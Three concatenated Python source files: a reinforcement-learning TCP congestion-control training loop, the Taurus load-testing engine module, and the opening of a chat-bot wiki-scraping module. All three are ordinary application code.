np.random.seed(1234)
actor_op = []
now = datetime.datetime.now()
tfeventdir = os.path.join( config.base_path, params.dict['logdir'], config.job_name+str(config.task) )
# print("tfeventdir:"+tfeventdir)
params.dict['train_dir'] = tfeventdir
if not os.path.exists(tfeventdir):
os.makedirs(tfeventdir)
summary_writer = tf.summary.FileWriterCache.get(tfeventdir)
with tf.device(shared_job_device):
agent = Agent(s_dim, a_dim, batch_size=params.dict['batch_size'], summary=summary_writer,h1_shape=params.dict['h1_shape'],
h2_shape=params.dict['h2_shape'],stddev=params.dict['stddev'],mem_size=params.dict['memsize'],gamma=params.dict['gamma'],
lr_c=params.dict['lr_c'],lr_a=params.dict['lr_a'],tau=params.dict['tau'],PER=params.dict['PER'],CDQ=params.dict['CDQ'],
LOSS_TYPE=params.dict['LOSS_TYPE'],noise_type=params.dict['noise_type'],noise_exp=params.dict['noise_exp'])
dtypes = [tf.float32, tf.float32, tf.float32, tf.float32, tf.float32]
shapes = [[s_dim], [a_dim], [1], [s_dim], [1]]
queue = tf.FIFOQueue(10000, dtypes, shapes, shared_name="rp_buf")
if is_learner:
with tf.device(params.dict['device']):
agent.build_learn()
agent.create_tf_summary()
if config.load and not config.eval:
if os.path.isfile(os.path.join(params.dict['train_dir'], "replay_memory.pkl")):
with open(os.path.join(params.dict['train_dir'], "replay_memory.pkl"), 'rb') as fp:
replay_memory = pickle.load(fp)
_killsignal = learner_killer(agent.rp_buffer)
for i in range(params.dict['num_actors']):
if is_actor_fn(i):
if params.dict['use_TCP']:
shrmem_r = sysv_ipc.SharedMemory(config.mem_r)
shrmem_w = sysv_ipc.SharedMemory(config.mem_w)
env = TCP_Env_Wrapper(env_str, params, config=config, for_init_only=False, shrmem_r=shrmem_r, shrmem_w=shrmem_w,use_normalizer=params.dict['use_normalizer'])
else:
env = GYM_Env_Wrapper(env_str, params)
a_s0 = tf.placeholder(tf.float32, shape=[s_dim], name='a_s0')
a_action = tf.placeholder(tf.float32, shape=[a_dim], name='a_action')
a_reward = tf.placeholder(tf.float32, shape=[1], name='a_reward')
a_s1 = tf.placeholder(tf.float32, shape=[s_dim], name='a_s1')
a_terminal = tf.placeholder(tf.float32, shape=[1], name='a_terminal')
a_buf = [a_s0, a_action, a_reward, a_s1, a_terminal]
with tf.device(shared_job_device):
actor_op.append(queue.enqueue(a_buf))
if is_learner:
Dequeue_Length = params.dict['dequeue_length']
dequeue = queue.dequeue_many(Dequeue_Length)
queuesize_op = queue.size()
if params.dict['ckptdir'] is not None:
params.dict['ckptdir'] = os.path.join( config.base_path, params.dict['ckptdir'])
print("## checkpoint dir:", params.dict['ckptdir'])
isckpt = os.path.isfile(os.path.join(params.dict['ckptdir'], 'checkpoint') )
print("## checkpoint exists?:", isckpt)
if not isckpt:
print("\n# # # # # # Warning ! ! ! No checkpoint is loaded, use random model! ! ! # # # # # #\n")
else:
params.dict['ckptdir'] = tfeventdir
tfconfig = tf.ConfigProto(allow_soft_placement=True)
if params.dict['single_actor_eval']:
mon_sess = tf.train.SingularMonitoredSession(
checkpoint_dir=params.dict['ckptdir'])
else:
mon_sess = tf.train.MonitoredTrainingSession(master=server.target,
save_checkpoint_secs=15,
save_summaries_secs=None,
save_summaries_steps=None,
is_chief=is_learner,
checkpoint_dir=params.dict['ckptdir'],
config=tfconfig,
hooks=None)
agent.assign_sess(mon_sess)
if is_learner:
if config.eval:
print("=========================Learner is up===================")
while not mon_sess.should_stop():
time.sleep(1)
continue
if config.load is False:
agent.init_target()
counter = 0
start = time.time()
dequeue_thread = threading.Thread(target=learner_dequeue_thread, args=(agent,params, mon_sess, dequeue, queuesize_op, Dequeue_Length),daemon=True)
first_time=True
while not mon_sess.should_stop():
if first_time:
dequeue_thread.start()
first_time=False
up_del_tmp=params.dict['update_delay']/1000.0
time.sleep(up_del_tmp)
if agent.rp_buffer.ptr>200 or agent.rp_buffer.full :
agent.train_step()
if not params.dict['use_hard_target']:
agent.target_update()
if counter %params.dict['hard_target'] == 0 :
current_opt_step = agent.sess.run(agent.global_step)
logger.info("Optimize step:{}".format(current_opt_step))
logger.info("rp_buffer ptr:{}".format(agent.rp_buffer.ptr))
else:
if counter %params.dict['hard_target'] == 0 :
agent.target_update()
current_opt_step = agent.sess.run(agent.global_step)
logger.info("Optimize step:{}".format(current_opt_step))
logger.info("rp_buffer ptr:{}".format(agent.rp_buffer.ptr))
counter += 1
else:
start = time.time()
step_counter = np.int64(0)
eval_step_counter = np.int64(0)
s0 = env.reset()
s0_rec_buffer = np.zeros([s_dim])
s1_rec_buffer = np.zeros([s_dim])
s0_rec_buffer[-1*params.dict['state_dim']:] = s0
if params.dict['recurrent']:
a = agent.get_action(s0_rec_buffer,not config.eval)
else:
a = agent.get_action(s0, not config.eval)
a = env.map_action(a[0][0])#matthew
env.write_action(a)
print("matthew:a2:"+str(a))
prev_cwnd=a
epoch = 0
ep_r = 0.0
start = time.time()
count=0
while True:
print("")
print(count)
count+=1
start = time.time()
print("matthew: time:"+str(start))
epoch += 1
# the state here is the previous step's state; the next state is decided by the cases below
step_counter += 1
s1, r, terminal, error_code,cwnd = env.step(a,eval_=config.eval)  # this action argument is basically unused
print("matthew:s1:"+str(s1))
if orca_state==Orca_state.Ordinary:
# print("matthew:stage:Ordinary")
if error_code:
s1_rec_buffer = np.concatenate( (s0_rec_buffer[params.dict['state_dim']:], s1) )
if params.dict['recurrent']:
a_rl = agent.get_action(s1_rec_buffer, not config.eval)
else:
a_rl = agent.get_action(s1,not config.eval)
a_r = env.map_action(a_rl[0][0])  # action proposed by the RL agent, already mapped to cwnd units
a_c = cwnd  # action proposed by Cubic
print("matthew:a_rl:"+str(a_r)+" a_cl:"+str(a_c))
# a_r is already mapped above, so it is compared to a_c directly here (the
# original applied map_action twice); the 0.2 mirrors th3 defined in main().
if abs(a_r-a_c) >= 0.2*prev_cwnd:
# enter the evaluation stage
if (a_r-prev_cwnd)*(a_c-prev_cwnd) >= 0:
# enter EI; note: entering EI is not the same as entering the evaluation stage
if a_r>a_c:
EI_sequence=1
a_final=a_r
orca_state=Orca_state.EI_r_1
else:
EI_sequence=0
a_final=a_c
orca_state=Orca_state.EI_c_1
else:
if (a_c-prev_cwnd)<0 :
a_final=a_c
else:
# enter EI
if a_r>a_c:
EI_sequence=1
a_final=a_r
orca_state=Orca_state.EI_r_1
else:
EI_sequence=0
a_final=a_c
orca_state=Orca_state.EI_c_1
elif orca_state==Orca_state.EI_c_1:
print("matthew:stage:EI_c_1")
if EI_sequence==0:  # Cubic went first; next state is EI_r_1
u_1=r  # u_1 obtained; still to be divided by the episode length later
orca_state=Orca_state.EI_r_1
a_final=a_r
else:
orca_state=Orca_state.EI_r_2
a_final=prev_cwnd
elif orca_state==Orca_state.EI_r_1:
print("matthew:stage:EI_r_1")
if EI_sequence==1:  # RL went first; next state is EI_c_1
u_1=r  # u_1 obtained; still to be divided by the episode length later
orca_state=Orca_state.EI_c_1
a_final=a_c
else:
orca_state=Orca_state.EI_c_2
a_final=prev_cwnd
elif orca_state==Orca_state.EI_c_2:
print("matthew:stage:EI_c_2")
if EI_sequence==0:  # Cubic went first; next state is EI_r_2
u_2=r  # u_2 obtained; still to be divided by the episode length later
orca_state=Orca_state.EI_r_2
# a_final=a_r
else:
orca_state=Orca_state.Ordinary  # evaluation finished, back to Ordinary
u_3=r
if max(u_2,u_3)>=u_1:
if u_2>u_3:  # EI_sequence == 1: RL went first
a_final=a_r
prev_cwnd=a_final
else:
a_final=a_c
prev_cwnd=a_final
else:
a_final=prev_cwnd
elif orca_state==Orca_state.EI_r_2:
print("matthew:stage:EI_r_2")
if EI_sequence==1:  # RL went first; next state is EI_c_2
u_2=r  # u_2 obtained; still to be divided by the episode length later
orca_state=Orca_state.EI_c_2
# a_final=a_r
else:
orca_state=Orca_state.Ordinary  # evaluation finished, back to Ordinary
u_3=r
if max(u_2,u_3)>=u_1:
if u_2>u_3:  # EI_sequence == 0: Cubic went first
a_final=a_c
prev_cwnd=a_final
else:
a_final=a_r
prev_cwnd=a_final
else:
a_final=prev_cwnd
# step_counter += 1
# s1, r, terminal, error_code,cwnd = env.step(a,eval_=config.eval)
# print("matthew:state:"+str(s1))
# if error_code == True:
# s1_rec_buffer = np.concatenate( (s0_rec_buffer[params.dict['state_dim']:], s1) )
# if params.dict['recurrent']:
# a_rl = agent.get_action(s1_rec_buffer, not config.eval)
# else:
# a_rl = agent.get_action(s1,not config.eval)
# a_final = env.map_action(a_rl[0][0])
env.write_action(a_final)
print("matthew:a3:"+str(a_final))
else:
print("TaskID:"+str(config.task)+"Invalid state received...\n")
env.write_action(a)
continue
if params.dict['recurrent']:
fd = {a_s0:s0_rec_buffer, a_action:a, a_reward:np.array([r]), a_s1:s1_rec_buffer, a_terminal:np.array([terminal], np.float32)}
else:
fd = {a_s0:s0, a_action:a, a_reward:np.array([r]), a_s1:s1, a_terminal:np.array([terminal], np.float32)}
if not config.eval:
mon_sess.run(actor_op, feed_dict=fd)
s0 = s1
a = a_final
if params.dict['recurrent']:
s0_rec_buffer = s1_rec_buffer
if not params.dict['use_TCP'] and (terminal):
if agent.actor_noise is not None:
agent.actor_noise.reset()
if (epoch% params.dict['eval_frequency'] == 0):
eval_step_counter = evaluate_TCP(env, agent, epoch, summary_writer, params, s0_rec_buffer, eval_step_counter)
print("total time:", time.time()-start)
def learner_dequeue_thread(agent,params, mon_sess, dequeue, queuesize_op, Dequeue_Length):
ct = 0
while True:
ct = ct + 1
data = mon_sess.run(dequeue)
agent.store_many_experience(data[0], data[1], data[2], data[3], data[4], Dequeue_Length)
time.sleep(0.01)
def learner_update_thread(agent,params):
delay=params.dict['update_delay']/1000.0
ct = 0
while True:
agent.train_step()
agent.target_update()
time.sleep(delay)
if __name__ == "__main__":
main()
|
engine.py | """
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import json
import logging
import os
import pkgutil
import shutil
import sys
import threading
import time
import traceback
import uuid
from distutils.version import LooseVersion
from urllib import parse
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException
from bzt.utils import reraise, load_class, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux
from bzt.utils import shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient, Environment
from .dicts import Configuration
from .modules import Provisioning, Reporter, Service, Aggregator, EngineModule
from .names import EXEC, TAURUS_ARTIFACTS_DIR, SETTINGS
from .templates import Singletone
from ..environment_helpers import expand_variable_with_os, custom_expandvars, expand_envs_with_os
from bzt.resources.version import VERSION
class Engine(object):
"""
Core entity of the technology, used to coordinate whole process
:type reporters: list[Reporter]
:type services: list[Service]
:type log: logging.Logger
:type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
:type stopping_reason: BaseException
"""
ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
def __init__(self, parent_logger):
"""
:type parent_logger: logging.Logger
"""
self.file_search_paths = []
self.services = []
self.__artifacts = []
self.reporters = []
self.artifacts_dir = None
self.log = parent_logger.getChild(self.__class__.__name__)
self.env = Environment(self.log) # backward compatibility
self.shared_env = Environment(self.log) # backward compatibility
self.config = Configuration()
self.config.log = self.log.getChild(Configuration.__name__)
self.modules = {} # available modules
self.provisioning = Provisioning()
self.aggregator = Aggregator(is_functional=False)
self.aggregator.engine = self
self.interrupted = False
self.check_interval = 1
self.stopping_reason = None
self.engine_loop_utilization = 0
self.prepared = []
self.started = []
self.default_cwd = None
self.logging_level_down = lambda: None
self.logging_level_up = lambda: None
self.user_pythonpath = None
self.temp_pythonpath = None
self._http_client = None
def set_pythonpath(self):
version = sys.version.split(' ')[0]
path_suffix = os.path.join('python-packages', version)
self.user_pythonpath = get_full_path(os.path.join("~", ".bzt", path_suffix))
self.temp_pythonpath = get_full_path(os.path.join(self.artifacts_dir, path_suffix))
current_pythonpath = os.environ.get('PYTHONPATH', '')
paths = self.user_pythonpath, self.temp_pythonpath, current_pythonpath
self.log.debug("Set PYTHONPATH to :\n\tUSER: '{}' +\n\tTEMP: '{}' +\n\tCURRENT: '{}'".format(*paths))
try:
user_packages = os.listdir(self.user_pythonpath)
except OSError:  # the user packages dir may not exist yet
user_packages = []
self.log.debug("Content of user packages dir: {}".format(user_packages))
os.environ['PYTHONPATH'] = os.pathsep.join(paths)
def configure(self, user_configs, read_config_files=True):
"""
Load configuration files
:type user_configs: list[str]
:type read_config_files: bool
"""
self.log.info("Configuring...")
if read_config_files:
self._load_base_configs()
merged_config = self._load_user_configs(user_configs)
all_includes = []
while "included-configs" in self.config:
includes = self.config.pop("included-configs")
included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
all_includes += includes
self.config.load(included_configs)
self.config['included-configs'] = all_includes
self.config.merge({"version": VERSION})
self.get_http_client()
if self.config.get(SETTINGS).get("check-updates", True):
install_id = self.config.get("install-id", self._generate_id())
def wrapper():
return self._check_updates(install_id)
thread = threading.Thread(target=wrapper) # intentionally non-daemon thread
thread.start()
return merged_config
def unify_config(self):
executions = self.config.get(EXEC, [])
if isinstance(executions, dict):
executions = [executions]
self.config[EXEC] = executions
settings = self.config.get(SETTINGS)
default_executor = settings.get("default-executor", None)
prov_type = self.config.get(Provisioning.PROV)
for execution in executions: # type: BetterDict
executor = execution.get("executor", default_executor, force_set=True)
if not executor:
msg = "Cannot determine executor type and no default executor in %s"
raise TaurusConfigError(msg % execution)
reporting = self.config.get(Reporter.REP, [])
for index in range(len(reporting)):
ensure_is_dict(reporting, index, "module")
services = self.config.get(Service.SERV, [])
for index in range(len(services)):
ensure_is_dict(services, index, "module")
modules = self.config.get("modules")
for module in modules:
ensure_is_dict(modules, module, "class")
@staticmethod
def _generate_id():
if os.getenv("JENKINS_HOME"):
prefix = "jenkins"
elif os.getenv("TRAVIS"):
prefix = "travis"
elif any([key.startswith("bamboo") for key in os.environ.keys()]):
prefix = "bamboo"
elif os.getenv("TEAMCITY_VERSION"):
prefix = "teamcity"
elif os.getenv("DOCKER_HOST"):
prefix = "docker"
elif os.getenv("AWS_"):
prefix = "amazon"
elif os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG"):
prefix = "google_cloud"
elif os.getenv("WEBJOBS_NAME"):
prefix = "azure"
elif is_linux():
prefix = 'linux'
elif is_windows():
prefix = 'windows'
else:
prefix = 'macos'
return "%s-%x" % (prefix, uuid.getnode())
def prepare(self):
"""
Prepare engine for work: calls prepare() on Provisioning and the
downstream EngineModule instances
"""
self.log.info("Preparing...")
self.unify_config()
interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
self.check_interval = dehumanize_time(interval)
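# dehumanize_time converts human-friendly intervals into seconds, e.g.
# "100ms" -> 0.1 and "1m" -> 60.0 (illustrative values, assuming the
# documented bzt.utils behaviour).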
try:
self.__prepare_aggregator()
self.__prepare_services()
self.__prepare_provisioning()
self.__prepare_reporters()
self.config.dump()
except BaseException as exc:
self.stopping_reason = exc
raise
def _startup(self):
modules = self.services + [self.aggregator] + self.reporters + [self.provisioning] # order matters
for module in modules:
self.log.debug("Startup %s", module)
self.started.append(module)
module.startup()
self.config.dump()
def start_subprocess(self, args, env, cwd=None, **kwargs):
if cwd is None:
cwd = self.default_cwd
return shell_exec(args, cwd=cwd, env=env.get(), **kwargs)
def run(self):
"""
Run the job. Calls `startup`, does periodic `check`,
calls `shutdown` in any case
"""
self.log.info("Starting...")
exc_info = exc_value = None
try:
self._startup()
self.logging_level_down()
self._wait()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
exc_value = exc
exc_info = sys.exc_info()
finally:
self.log.warning("Please wait for graceful shutdown...")
try:
self.logging_level_up()
self._shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if exc_value:
reraise(exc_info, exc_value)
def _check_modules_list(self):
stop = False
modules = [self.provisioning, self.aggregator] + self.services + self.reporters # order matters
for module in modules:
if module in self.started:
self.log.debug("Checking %s", module)
finished = bool(module.check())
if finished:
self.log.debug("%s finished", module)
stop = finished
return stop
def _wait(self):
"""
Wait for modules to finish
:return:
"""
prev = time.time()
while not self._check_modules_list():
now = time.time()
diff = now - prev
delay = self.check_interval - diff
self.engine_loop_utilization = diff / self.check_interval
self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
if delay > 0:
time.sleep(delay)
prev = time.time()
if self.interrupted:
raise ManualShutdown()
self.config.dump()
def _shutdown(self):
"""
Shutdown modules
:return:
"""
self.log.info("Shutting down...")
self.log.debug("Current stop reason: %s", self.stopping_reason)
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
for module in modules:
try:
if module in self.started:
module.shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_value:
reraise(exc_info, exc_value)
def post_process(self):
"""
Do post-run analysis and processing for the results.
"""
self.log.info("Post-processing...")
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
# services go last because of shellexec, which is the "final-final" action
for module in modules:
if module in self.prepared:
try:
module.post_process()
except BaseException as exc:
if isinstance(exc, KeyboardInterrupt):
self.log.debug("post_process: %s", exc)
else:
self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def create_artifact(self, prefix, suffix):
"""
Create new artifact in artifacts dir with given prefix and suffix
:type prefix: str
:type suffix: str
:return: Path to created file
:rtype: str
:raise TaurusInternalException: if no artifacts dir set
"""
if not self.artifacts_dir:
raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")
filename = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
self.__artifacts.append(filename)
self.log.debug("New artifact filename: %s", filename)
return filename
def existing_artifact(self, filename, move=False, target_filename=None):
"""
Add existing artifact, it will be collected into artifact_dir. If
move=True, the original file will be deleted
:type filename: str
:type move: bool
:type target_filename: str
"""
self.log.debug("Add existing artifact (move=%s): %s", move, filename)
if self.artifacts_dir is None:
self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
return
new_filename = os.path.basename(filename) if target_filename is None else target_filename
new_name = os.path.join(self.artifacts_dir, new_filename)
self.__artifacts.append(new_name)
if get_full_path(filename) == get_full_path(new_name):
self.log.debug("No need to copy %s", filename)
return
if not os.path.exists(filename):
self.log.warning("Artifact file not exists: %s", filename)
return
if move:
self.log.debug("Moving %s to %s", filename, new_name)
shutil.move(filename, new_name)
else:
self.log.debug("Copying %s to %s", filename, new_name)
shutil.copy(filename, new_name)
def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
"""
Create directory for artifacts, directory name based on datetime.now()
"""
if not self.artifacts_dir:
artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
self.artifacts_dir = self.__expand_artifacts_dir()
self.log.info("Artifacts dir: %s", self.artifacts_dir)
os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
if not os.path.isdir(self.artifacts_dir):
os.makedirs(self.artifacts_dir)
# dump current effective configuration
dump = self.create_artifact("effective", "") # TODO: not good since this file not exists
self.config.set_dump_file(dump)
self.config.dump()
# dump merged configuration
if merged_config:
merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
for artifact in existing_artifacts:
self.existing_artifact(artifact)
def __expand_artifacts_dir(self):
envs = self.__get_envs_from_config()
artifacts_dir = custom_expandvars(self.artifacts_dir, envs)
artifacts_dir = expand_variable_with_os(artifacts_dir)
artifacts_dir = get_full_path(artifacts_dir)
return artifacts_dir
def is_functional_mode(self):
return self.aggregator is not None and self.aggregator.is_functional
def __load_module(self, alias):
"""
Load module class by alias
:param alias: str
:return: class
"""
if alias in self.modules:
return self.modules[alias]
mod_conf = self.config.get('modules')
if alias not in mod_conf:
msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
raise TaurusConfigError(msg)
settings = ensure_is_dict(mod_conf, alias, "class")
acopy = copy.deepcopy(settings)
BetterDict.traverse(acopy, Configuration.masq_sensitive)
self.log.debug("Module config: %s %s", alias, acopy)
err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
clsname = settings.get('class', err)
self.modules[alias] = load_class(clsname)
if not issubclass(self.modules[alias], EngineModule):
raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)
return self.modules[alias]
def instantiate_module(self, alias):
"""
Create new instance for module using its alias from module settings
section of config. Thus, to instantiate module it should be mentioned
in settings.
:type alias: str
:rtype: EngineModule
"""
classobj = self.__load_module(alias)
instance = classobj()
assert isinstance(instance, EngineModule)
instance.log = self.log.getChild(alias)
instance.engine = self
settings = self.config.get("modules")
instance.settings = settings.get(alias)
return instance
def find_file(self, filename):
"""
Try to find a file or dir in the search paths, if any were specified. Helps to find
files in non-CLI environments or relative to the config path.
The returned path is absolute and needs no further abspath/normalization.
:param filename: file basename to find
:type filename: str
"""
if not filename:
return filename
if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
parsed_url = parse.urlparse(filename)
downloader = ExceptionalDownloader(self.get_http_client())
self.log.info("Downloading %s", filename)
tmp_f_name, headers = downloader.get(filename)
cd_header = headers.get('Content-Disposition', '')
dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
dest = dest[1:-1]
elif not dest:
dest = os.path.basename(parsed_url.path)
fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
dest = self.create_artifact(fname, ext)
self.log.debug("Moving %s to %s", tmp_f_name, dest)
shutil.move(tmp_f_name, dest)
return dest
else:
filename = os.path.expanduser(filename) # expanding of '~' is required for check of existence
# check filename 'as is' and all combinations of file_search_path/filename
for dirname in [""] + self.file_search_paths:
location = os.path.join(dirname, filename)
if os.path.exists(location):
if dirname:
self.log.warning("Guessed location from search paths for %s: %s", filename, location)
return get_full_path(location)
self.log.warning("Could not find location at path: %s", filename)
return filename
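# Illustrative calls (paths hypothetical): a URL is downloaded into the
# artifacts dir, while a bare name is resolved against file_search_paths:
#   engine.find_file("https://example.com/plan.jmx")
#   engine.find_file("scenario.yml")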
def _load_base_configs(self):
configs = []
try:
sys.path.insert(0, os.path.curdir) # necessary for development mode (running bzt from curdir)
configs.extend(self._scan_system_configs())
configs.extend(self._scan_package_configs())
finally:
sys.path.pop(0)
configs.sort(key=os.path.basename)
self.log.debug("Base configs list: %s", configs)
if not configs:
self.log.warning("No base configs were discovered")
self.config.load(configs)
def _scan_package_configs(self):
configs = []
for importer, modname, ispkg in pkgutil.iter_modules(path=None):
try:
if not ispkg:
continue
package_path = getattr(importer, 'path', None)
if package_path is None:
continue
index_path = os.path.join(package_path, modname, 'bzt-configs.json')
if not os.path.exists(index_path):
continue
try:
with codecs.open(index_path, 'rb', encoding='utf-8') as fds:
index_configs = json.load(fds)
except (OSError, IOError, ValueError) as exc:
self.log.debug("Can't load package-specific bzt config %s: %s", index_path, exc)
continue
if not isinstance(index_configs, list):
self.log.debug("Error: value of bzt-configs.json should be a list (%s)" % index_path)
continue
for config_name in index_configs:
configs.append(os.path.join(importer.path, modname, config_name))
except BaseException as exc:
self.log.warning("Can't look for package configs in package %r: %s", modname, str(exc))
self.log.debug("Traceback: %s", traceback.format_exc())
return configs
def _scan_system_configs(self):
configs = []
machine_dir = get_configs_dir() # can't refactor machine_dir out - see setup.py
if os.path.isdir(machine_dir):
self.log.debug("Reading system configs from: %s", machine_dir)
for cfile in sorted(os.listdir(machine_dir)):
fname = os.path.join(machine_dir, cfile)
if os.path.isfile(fname):
configs.append(fname)
return configs
def _load_user_configs(self, user_configs):
"""
:type user_configs: list[str]
:rtype: Configuration
"""
# "tab-replacement-spaces" is not documented 'cause it loads only from base configs
# so it's sort of half-working last resort
self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
self.log.debug("User configs list: %s", user_configs)
self.config.load(user_configs)
user_config = Configuration()
user_config.log = self.log.getChild(Configuration.__name__)
user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
user_config.warn_on_tab_replacement = False
user_config.load(user_configs, self.__config_loaded)
return user_config
def __config_loaded(self, config):
self.file_search_paths.append(get_full_path(config, step_up=1))
def __prepare_provisioning(self):
"""
Instantiate provisioning class
"""
err = TaurusConfigError("Please check global config availability or configure provisioning settings")
cls = self.config.get(Provisioning.PROV, err)
self.provisioning = self.instantiate_module(cls)
self.prepared.append(self.provisioning)
self.provisioning.prepare()
def __prepare_reporters(self):
"""
Instantiate reporters, then prepare them in case they would like to interact
"""
reporting = self.config.get(Reporter.REP, [])
for index, reporter in enumerate(reporting):
msg = "reporter 'module' field isn't recognized: %s"
cls = reporter.get('module', TaurusConfigError(msg % reporter))
instance = self.instantiate_module(cls)
instance.parameters = reporter
if self.__singletone_exists(instance, self.reporters):
continue
assert isinstance(instance, Reporter)
self.reporters.append(instance)
for reporter in self.reporters[:]:
if not reporter.should_run():
self.reporters.remove(reporter)
# prepare reporters
for module in self.reporters:
self.prepared.append(module)
module.prepare()
def __prepare_services(self):
"""
Instantiate service modules, then prepare them
"""
srv_config = self.config.get(Service.SERV, [])
services = []
for index, config in enumerate(srv_config):
cls = config.get('module', '')
instance = self.instantiate_module(cls)
instance.parameters = config
if self.__singletone_exists(instance, services):
continue
assert isinstance(instance, Service)
services.append(instance)
for service in services[:]:
if not service.should_run():
services.remove(service)
self.services.extend(services)
for module in self.services:
self.prepared.append(module)
module.prepare()
def __singletone_exists(self, instance, mods_list):
"""
:type instance: EngineModule
:type mods_list: list[EngineModule]
:rtype: bool
"""
if not isinstance(instance, Singletone):
return False
for mod in mods_list:
if mod.parameters.get("module") == instance.parameters.get("module"):
msg = "Module '%s' can be only used once, will merge all new instances into single"
self.log.warning(msg % mod.parameters.get("module"))
mod.parameters.merge(instance.parameters)
return True
return False
def __prepare_aggregator(self):
"""
Instantiate aggregators
:return:
"""
cls = self.config.get(SETTINGS).get("aggregator", "")
if not cls:
self.log.warning("Proceeding without aggregator, no results analysis")
else:
self.aggregator = self.instantiate_module(cls)
self.prepared.append(self.aggregator)
self.aggregator.prepare()
def get_http_client(self):
if self._http_client is None:
self._http_client = HTTPClient()
self._http_client.add_proxy_settings(self.config.get("settings").get("proxy"))
return self._http_client
def _check_updates(self, install_id):
try:
params = (VERSION, install_id)
addr = "https://gettaurus.org/updates/?version=%s&installID=%s" % params
self.log.debug("Requesting updates info: %s", addr)
client = self.get_http_client()
response = client.request('GET', addr, timeout=10)
data = response.json()
self.log.debug("Taurus updates info: %s", data)
mine = LooseVersion(VERSION)
latest = LooseVersion(data['latest'])
if mine != "DEV" and (mine < latest or data['needsUpgrade']):
msg = "There is newer version of Taurus %s available, consider upgrading. " \
"What's new: http://gettaurus.org/docs/Changelog/"
self.log.warning(msg, latest)
else:
self.log.debug("Installation is up-to-date")
except BaseException:
self.log.debug("Failed to check for updates: %s", traceback.format_exc())
self.log.warning("Failed to check for updates")
def eval_env(self):
"""
Should be done after `configure`
"""
envs = self.__get_envs_from_config()
envs = expand_envs_with_os(envs)
def apply_env(value, key, container):
if isinstance(value, str):
container[key] = custom_expandvars(value, envs)
BetterDict.traverse(self.config, apply_env)
self.__export_variables_to_os()
def __export_variables_to_os(self):
"""
Export all user-defined environment variables to the system.
Example:
settings:
env:
FOO: bbb/ccc
BAR: aaa
"""
envs = self.__get_envs_from_config()
for var_name in envs:
if envs[var_name] is None:
if var_name in os.environ:
os.environ.pop(var_name)
else:
os.environ[var_name] = envs[var_name]
self.log.debug("OS env: %s=%s", var_name, envs[var_name])
def __get_envs_from_config(self):
envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
return envs
|
unit.py | import getopt
import logging
import multiprocessing
import os
import re
import shlex
import tempfile
import time
from urllib import parse
import requests
from PIL import Image
from bs4 import BeautifulSoup, Tag
from dogbot.cqsdk import CQImage
from mongoengine import QuerySet, Q
from selenium import webdriver
from config import config
from dogbot.cqsdk.utils import reply
from dogbot.models import Class, Unit
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'
}
BASE_URL = 'http://wikiwiki.jp/aigiszuki/'
RARITY = '铜铁银金白黑蓝'
class UnitException(Exception):
pass
def get_status_pic(name):
"""
Fetch the unit's status picture. Source: http://wikiwiki.jp/aigiszuki/
:param name: full unit name; raises UnitException when the page is not found.
:return: a PIL Image instance, which can be saved with its save method.
"""
logging.info("Grabbing ...")
resp = requests.get(
BASE_URL + '?' + parse.urlencode({
"cmd": "edit",
"page": name
}, encoding="utf-8"),
headers=HEADERS
)
# check whether the page exists
